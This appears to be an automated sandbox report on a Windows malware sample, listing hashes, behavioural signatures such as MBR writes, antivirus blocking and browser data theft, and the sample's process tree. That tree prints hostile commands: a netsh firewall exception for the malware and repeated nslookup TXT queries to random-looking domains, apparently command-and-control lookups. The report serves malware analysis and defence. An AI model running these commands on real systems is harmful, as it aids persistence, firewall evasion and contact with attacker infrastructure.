Analysis

  • max time kernel
    152s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2022, 07:45

General

  • Target

    55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe

  • Size

    2.3MB

  • MD5

    692213b2c7610cdb5656fb1f138e181e

  • SHA1

    1581c44c08e239417d1904a4b706fa2a7a742f71

  • SHA256

    55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b

  • SHA512

    55705633ef5c769b0618dc20f2d716535846e00d71ea7f727f079969353410561a4b85f6f5eca0be8a36eeb02b71a931c56fcd1d0c4b64658ad69912f417d9ff

  • SSDEEP

    49152:OBrlCNnO0x9qk4QLH2mUrQOyH6A1retpOls:OBBoOa9UKWm0262y

Malware Config

Signatures

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Blocks application from running via registry modification 18 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 5 IoCs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 36 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe
    "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4344
    • C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe
      "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe" "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe"
      2⤵
      • Enumerates VirtualBox registry keys
      • Blocks application from running via registry modification
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks for any installed AV software in registry
      • Enumerates connected drives
      • Writes to the Master Boot Record (MBR)
      • Modifies Internet Explorer settings
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\SysWOW64\Wbem\mofcomp.exe
        mofcomp "C:\Users\Admin\AppData\Local\Temp\5371.mof"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Windows\SysWOW64\netsh.exe
        netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe" "System Smart Security" ENABLE
        3⤵
          PID:2060
        • C:\Windows\SysWOW64\nslookup.exe
          nslookup -q=txt jj153svdksafjnqv.com 8.8.8.8
          3⤵
            PID:3752
          • C:\Windows\SysWOW64\nslookup.exe
            nslookup -q=txt jj153svdksafjnqv.net 8.8.8.8
            3⤵
              PID:220
            • C:\Windows\SysWOW64\nslookup.exe
              nslookup -q=txt jj153svdksafjnqv.com 208.67.222.222
              3⤵
                PID:3540
              • C:\Windows\SysWOW64\nslookup.exe
                nslookup -q=txt jj153svdksafjnqv.net 208.67.222.222
                3⤵
                  PID:4908
                • C:\Windows\SysWOW64\nslookup.exe
                  nslookup -q=txt jj153svdksafjnqv.com 8.8.4.4
                  3⤵
                    PID:4360
                  • C:\Windows\SysWOW64\nslookup.exe
                    nslookup -q=txt jj153svdksafjnqv.net 8.8.4.4
                    3⤵
                      PID:436
                    • C:\Windows\SysWOW64\nslookup.exe
                      nslookup -q=txt jj153svdksafjnqv.com 208.67.220.220
                      3⤵
                        PID:3964
                      • C:\Windows\SysWOW64\nslookup.exe
                        nslookup -q=txt jj153svdksafjnqv.net 208.67.220.220
                        3⤵
                          PID:5116
                        • C:\Windows\SysWOW64\nslookup.exe
                          nslookup -q=txt eejllo680ooxggl.com 8.8.8.8
                          3⤵
                            PID:1584
                          • C:\Windows\SysWOW64\nslookup.exe
                            nslookup -q=txt eejllo680ooxggl.net 8.8.8.8
                            3⤵
                              PID:2320
                            • C:\Windows\SysWOW64\nslookup.exe
                              nslookup -q=txt eejllo680ooxggl.com 208.67.222.222
                              3⤵
                                PID:2660
                              • C:\Windows\SysWOW64\nslookup.exe
                                nslookup -q=txt eejllo680ooxggl.net 208.67.222.222
                                3⤵
                                  PID:3344
                                • C:\Windows\SysWOW64\nslookup.exe
                                  nslookup -q=txt eejllo680ooxggl.com 8.8.4.4
                                  3⤵
                                    PID:3188
                                  • C:\Windows\SysWOW64\nslookup.exe
                                    nslookup -q=txt eejllo680ooxggl.net 8.8.4.4
                                    3⤵
                                      PID:4852
                                    • C:\Windows\SysWOW64\nslookup.exe
                                      nslookup -q=txt eejllo680ooxggl.com 208.67.220.220
                                      3⤵
                                        PID:3404
                                      • C:\Windows\SysWOW64\nslookup.exe
                                        nslookup -q=txt eejllo680ooxggl.net 208.67.220.220
                                        3⤵
                                          PID:4516
                                        • C:\Windows\SysWOW64\nslookup.exe
                                          nslookup -q=txt joqzeltvzhm1615r.com 8.8.8.8
                                          3⤵
                                            PID:1332
                                          • C:\Windows\SysWOW64\nslookup.exe
                                            nslookup -q=txt joqzeltvzhm1615r.net 8.8.8.8
                                            3⤵
                                              PID:3976
                                            • C:\Windows\SysWOW64\nslookup.exe
                                              nslookup -q=txt joqzeltvzhm1615r.com 208.67.222.222
                                              3⤵
                                                PID:528
                                              • C:\Windows\SysWOW64\nslookup.exe
                                                nslookup -q=txt joqzeltvzhm1615r.net 208.67.222.222
                                                3⤵
                                                  PID:5004
                                                • C:\Windows\SysWOW64\nslookup.exe
                                                  nslookup -q=txt joqzeltvzhm1615r.com 8.8.4.4
                                                  3⤵
                                                    PID:3532
                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                    nslookup -q=txt joqzeltvzhm1615r.net 8.8.4.4
                                                    3⤵
                                                      PID:1424
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup -q=txt joqzeltvzhm1615r.com 208.67.220.220
                                                      3⤵
                                                        PID:380
                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                        nslookup -q=txt joqzeltvzhm1615r.net 208.67.220.220
                                                        3⤵
                                                          PID:3092

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\5371.mof

                                                      Filesize

                                                      340B

                                                      MD5

                                                      d37b493814e9f43c0d7a9461b2bf6315

                                                      SHA1

                                                      045d3cb6cbde9893d670d3c1742ccc1f6fff0387

                                                      SHA256

                                                      07acf96a1e3f0474c5d6a9e51dbf26967a0328186b382fdc9bbeb702527277ad

                                                      SHA512

                                                      fb4ca0ecf430ed14b401eb54ba01276c4d9592c51a2e4daa8490593f06c768ffa867107bf86f56a66400078239c98f5218c4c45bec2410b70216df9d8a82bc3f

                                                    • memory/4208-137-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/4208-133-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/4208-135-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/4208-144-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/4208-136-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                    • memory/4208-138-0x0000000013140000-0x000000001372E000-memory.dmp

                                                      Filesize

                                                      5.9MB